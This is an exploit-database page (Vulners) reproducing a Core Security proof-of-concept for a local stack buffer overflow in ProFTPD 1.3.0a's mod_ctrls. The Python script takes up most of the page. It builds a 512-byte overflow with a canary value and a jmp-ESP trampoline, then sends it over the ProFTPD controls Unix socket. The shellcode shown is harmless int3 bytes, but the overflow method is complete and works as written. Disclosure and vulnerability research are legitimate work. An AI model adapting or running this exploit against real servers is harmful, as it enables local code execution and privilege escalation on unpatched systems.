Vulners
Lucene search
ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
===============================================================
ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
===============================================================
# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow
import socket
import os, os.path,stat
#This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu edgy)
#
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "\0\0\x0a\xff"
trampoline = "\x77\xe7\xff\xff" # jmp ESP on vdso
shellcode = "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" # inocuous "int 3"
#Build Payload. The format on the stack is:
#
#AAAA = EBX BBBB = ESI CCCC = EDI DDDD = EBP EEEE = EIP
payload = ("A"*512) + canary + "AAAABBBBCCCCDDDD" + trampoline + shellcode
#Setup socket
#
if os.path.exists(mySocket):
os.remove(mySocket)
s = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM)
s.bind(mySocket)
os.chmod(mySocket,stat.S_IRWXU)
s.connect(ctrlSocket)
#Send payload
#
s.send("\1\0\0\0")
s.send("\1\0\0\0")
l = len(payload)
s.send(chr(l & 255)+chr((l/255) & 255)+"\0\0")
s.send(payload)
#Finished
#
s.close()
# 0day.today [2018-02-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Dec 2006 00:00Current
7High risk
Vulners AI Score7